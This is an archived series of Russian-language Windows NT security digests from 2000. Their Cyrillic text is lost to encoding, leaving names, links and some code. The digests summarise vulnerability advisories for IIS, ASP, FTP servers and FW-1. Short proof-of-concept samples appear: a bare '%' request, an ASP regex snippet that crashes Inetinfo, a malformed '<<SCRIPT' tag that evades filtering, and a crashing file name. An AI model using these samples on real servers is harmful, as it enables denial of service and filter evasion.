   Macmillan Technical Publishing   "DCE/RPC 
over SMB: Samba and Windows NT Domain Internals"     
   ,  NTLMv1, NTLMv2, 
NTLMSSP, the Domain Logon Protocol.

4.  513

Randy Franklin Smith (ntbugtraq) ,     
  event 513 "system shutdown". Frank Heyne <fh@RCS.URZ.TU-
DRESDEN.DE> (http://rcswww.urz.tu-dresden.de/~fh/) ,   
   FAQ

http://www.heysoft.de/nt/eventlog/faqa.htm#A9

5.   

darkplan <darkplan@OCEANFREE.NET> (ntbugtraq)  
   Nullsoft Winamp 2.10.    
 http://indigo.ie/~lmf.


Ussr Labs <labs@USSRBACK.COM> (ntbugtraq) (Win2KSecAdvice) 
    .    
    Super Mail Transfer Package (SMTP) Server for 
WinNT Version 1.9x.

   

http://www.ussrback.com/
http://www.w00w00.org/advisories.html

Jarle Aase <jgaa@JGAA.COM> (Win2KsecAdvice)     
  WAR FTP DAEMON,     
  .      
. http://war.jgaa.com/alert/



From rudnyi Sat Jan 29 12:49:48 2000
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id MAA19893
	for rudnyi@comp.chem.msu.su; Sat, 29 Jan 2000 12:49:47 +0300 (MSK)
Date: Sat, 29 Jan 2000 12:49:47 +0300 (MSK)
Message-Id: <200001290949.MAA19893@comp.chem.msu.su>
Subject: digest 14-27.1.2000
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 2000,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

14 - 27  2000 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.       
RDISK

Arne Vidstrom <arne.vidstrom@NTSECURITY.NU> (ntbugtraq) ,  
    RDISK    
$$hive$$.tmp,   . ,  ,   
 .      

http://ntsecurity.nu/advisories/a12.shtml

  

http://www.microsoft.com/security/bulletins/ms00-004.asp
http://support.microsoft.com/support/kb/articles/q249/1/08.asp

2.    
  

Richard Puckett <RPuckett@snl.com> (ntbugtraq) ,   
  LPC Port Spoofing Hotfix    
 

HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion

 Martin Herbener <mherbene@kde.state.ky.us> (ntbugtraq) 
 ,    vdext4i (Q238349, Malformed GET 
Header DOS) -    hotfix.inf  "unexpected uninstall 
directory".

3.     RTF

 Microsoft Product Security <secnotif@MICROSOFT.COM> 
 ,      RTF 
  Windows 95  98,  Windows NT 4.0.    
         .

http://support.microsoft.com/support/kb/articles/q249/9/73.asp
http://www.microsoft.com/security/bulletins/MS00-005faq.asp

4.   webhits.dll

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq)    
webhits.dll (    IIS 4),   
    .     

http://www.cerberus-infosec.co.uk/advisories.html

 -    .htw c webhits.dll  Internet 
Service Manager.

  .

http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
http://www.microsoft.com/technet/security/bulletin/fq00-006.asp
http://www.microsoft.com/technet/support/kb.asp?ID=251170
http://www.microsoft.com/technet/support/kb.asp?ID=252463

5.  ,   


Paul Robichaux <paulr@HIWAAY.NET> (ntbugtraq) ,    
      .

http://www.robichaux.net/files/mwr-ch05.pdf.zip
  regedt32      .

http://www.robichaux.net/files/mwr-ch09.pdf.zip
    HOWTO.

6.  Request  ASP

PietroDi Mosmanza <peter@INFO.NL> (ntbugtraq) ,    
  Web-    GET, 
  %,   Request  ASP     
 ,      
  . 

,   

http://www.myserver.com/default.asp?variable=3D%

  

Request("variable") =3D <bogus_string>

 3D    ,    
  .

7.  Inetinfo

valentijn <valentijn@MY.NET> (ntbugtraq) ,    
ASP        Inetinfo.

<%
Set fso = createobject("scripting.filesystemobject")
        Checkfile = server.MapPath("\") & 
"\index\mypage.html"
        mystring = fso.OpenTextFile 
((checkfile)).ReadAll

        set myregexp = new regexp

        myregexp.Global = TRUE
        myregexp.IgnoreCase = true
        ' Normal regular expresion
        'myregexp.Pattern = "[A-Z0-9\.\-\_\ ]+"
        ' A not valid expression
        myregexp.Pattern = ".*"
        set mymatches =myregexp.Execute (mystring)

        for each thing in mymatches
                Response.Write thing
        next
%>

8.   

hoglund@IEWAY.COM, http://www.rootkit.com (ntbugtraq)  
    InetServ 3.0.    ( 
    www.ntbugtraq.com)     
     .


From rudnyi Sat Feb  5 14:11:42 2000
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id OAA00717
	for rudnyi@comp.chem.msu.su; Sat, 5 Feb 2000 14:11:41 +0300 (MSK)
Date: Sat, 5 Feb 2000 14:11:41 +0300 (MSK)
Message-Id: <200002051111.OAA00717@comp.chem.msu.su>
Subject: digest 28.1-3.2.2000
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 2000,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

28  - 3  2000 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.  "Recycle Bin Creation"

Arne Vidstrom <arne.vidstrom@NTSECURITY.NU>  Nobuo Miwa <n-
miwa@LAC.CO.JP> (ntbugtraq)      
  Windows NT  Windows 2000.

  NTFS      ,   
        . 
,      ,    
     ,       
c:\recycler    SID       
 Full Access  .     
     .

     

http://ntsecurity.nu/advisories/a14.shtml
http://www.lac.co.jp/security/

 -
http://www.lac.co.jp/security/test/files/RecyclerSnooper.exe

  

http://www.microsoft.com/technet/security/bulletin/ms00-007.asp
http://www.microsoft.com/technet/security/bulletin/fq00-007.asp

2.   Index Server

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq)  
  IIS 4 / IS 2 IDQ.

  IIS   .idq     Index 
Server,         .htx (, 
CiTemplate = %TemplateName%),     
    .

         
,         IDQ ,  
         .

    

http://www.cerberus-infosec.co.uk/advisories.html

3.     ASP

Graeme Slogrove <Graeme@NA.CO.ZA> (ntbugtraq)  ,  
   ASP     Visual Interdev, 
Home Site  .        
 .bak,       
 .

 -    .  -  .bak  
   ,   .bak  
.asp ,   Read IIS     asp-
.

4. How I hacked PacketStorm

rain forest puppy <rfp@WIRETRIP.NET> (Win2KsecAdvice)  
  How I hacked PacketStorm,    

http://www.wiretrip.net/rfp/2/index.asp

      SQL-.

5. L0phtCrack  Win2K

Liam Colvin <liamc@DSL.TELOCITY.COM> (ntbugtraq) ,  
L0phtCrack     Win2K.

Weld Pond <weld@L0PHT.COM> (ntbugtraq) ,   Win2K  
  syskey,      

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Lsa\SecureBoot

,   L0phtCrack   
pwdump2 (http://www.webspan.net/~tas/pwdump2/).

6. CERT Advisory 2000-02

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)    


http://www.cert.org/advisories/CA-2000-02.html

   ,     "malicious 
HTML tags/content"  Web-,       
  .

7.  FrontPage

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq)    
    MS Frontpage.   
     ,   
       .  
   

http://www.cerberus-infosec.co.uk/advisories.html

8.  

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq)   
  CIS vulnerability scanner  Windows NT  2000  
         . 
   

http://www.cerberus-infosec.co.uk/

9. FW-1  

"Arne Vidstrom" <arne.vidstrom@NTSECURITY.NU> (ntbugtraq) 
(Win2KsecAdvice) ,  FW-1    HTML-, 
      <.   

<HTML>
<HEAD>
<<SCRIPT LANGUAGE="JavaScript">
alert("hello world")
</SCRIPT>
</HEAD>
<BODY>
test
</BODY>
</HTML>

  FW-1    IE  Netscape.

10.   

Rob Hughes <rdhughes@HOME.COM> (ntbugtraq) ,   
FTPPro          
 .

Ussr Labs <labs@USSRBACK.COM> (ntbugtraq)    
 Serv-U FTP-Server v2.5b -  http://www.ussrback.com/.


From rudnyi Mon Feb 21 09:50:18 2000
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id JAA06372
	for rudnyi@comp.chem.msu.su; Mon, 21 Feb 2000 09:50:17 +0300 (MSK)
Date: Mon, 21 Feb 2000 09:50:17 +0300 (MSK)
Message-Id: <200002210650.JAA06372@comp.chem.msu.su>
Subject: digest 4-17.2.2000
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 2000,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

4 - 17  2000 

  

  Windows 2000 - ?!
  ...

   1   1  2000    
 Microsoft Training.Ru     
 -    
 "  !"   Microsoft Windows 2000 
        .

      -, 
   Microsoft   , 
    Training.Ru.

  

http://training.ru/w2kFree.htm


        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (   
- http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.	128-   

Alan Ramsbottom <ACR@ALS.CO.UK>  ,    
   128- .

http://www.microsoft.com/windows/ie/download/128bit/intro.htm

Bronek Kozicki <bronek@WPI.COM.PL> (ntbugtraq)    
 .

http://www.microsoft.com/exporting/
http://www.microsoft.com/PressPass/press/2000/Jan00/encryptionPR.asp

 John B Andrews <jbandrews@LINEONE.NET> (ntbugtraq) ,  
 128-    ,     
     (SP).  SP, 
  128- ,    -
        .

2.	   

"Colman, Clem" <Clem.Colman@DVA.GOV.AU> (ntbugtraq)   
  .   W   ,  
   S.        W  
    S       
    W.      
   ,    ,     
     . 
      ,   
        
    .

 McAllister James A <mcallister.ja@MELLON.COM> (ntbugtraq) 
    NT SP3 (.  Q182918 "Account 
Lockout Event also Stored in Security Event Log on DC").    
   SP4 (     
      ),  SP5  
   SP3.

3.	   "  
"

"Free, Bob" <RWF4@PGE.COM>  Bill Bradley <BillB@VENKEL.COM> 
(ntbugtraq)   ,   .

http://www.microsoft.com/technet/security/dosrv.asp
http://packetstorm.securify.com/distributed/firstaid.txt

Simple Nomad <thegnome@NMRC.ORG> (win2ksecadvice)   
    

http://razor.bindview.com/ -    Zombie Zapper.

4.	W2000:     
  

"Brown, Keith" <KBrown@DEVELOP.COM> (ntbugtraq) ,  , 
  "distinguished principal"  Windows 2000,   
    . -   

http://www.develop.com/kbrown/w2k_winsta_bug.zip

5.	      Pickup 
  Inetinfo

valentijn <iam@MY.NET> (ntbugtraq) ,      
 , ,

<one 
line>GGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLL
NGCGUCBJLMIUCYQIJTHJQVGNHZNYXMrad38A88.tmp.eml</one line>

  pickup,        Inetinfo.  
  IIS 4    SP.

6.	Active Directory

Torren Craigie-Manson <torren@HOME.COM> (ntbugtraq)    
Novell     Active Directory

http://www.novell.com/advantage/nds/ad-security.html

    

http://www.microsoft.com/windows2000/news/bulletins/novellresponse.asp

7.	  

Nobuo Miwa <n-miwa@LAC.CO.JP> (ntbugtraq)    
     Internet Anywhere Mail Server Ver.3.1.3. 
   http://www.lac.co.jp/security/.

Derek Shaw <derekshaw.is@BIGFOOT.COM> (win2ksecadvice)   
,    WAR-ftpd 

http://war.jgaa.com/alert/

Robert van der Meulen <rvdm@cistron.nl> (win2ksecadvice)   
  MySQL.       3.22.26a.  
   www.mysql.org.


From rudnyi Sat Mar  4 15:43:14 2000
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id PAA27780
	for rudnyi@comp.chem.msu.su; Sat, 4 Mar 2000 15:43:13 +0300 (MSK)
Date: Sat, 4 Mar 2000 15:43:13 +0300 (MSK)
Message-Id: <200003041243.PAA27780@comp.chem.msu.su>
Subject: digest 
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

  ,

 ,    ( )   
. 

       Windows 2000

	http://training.ru/w2k_de.htm

      .

,        Windows 2000 
.

 ,

    Training.ru

 


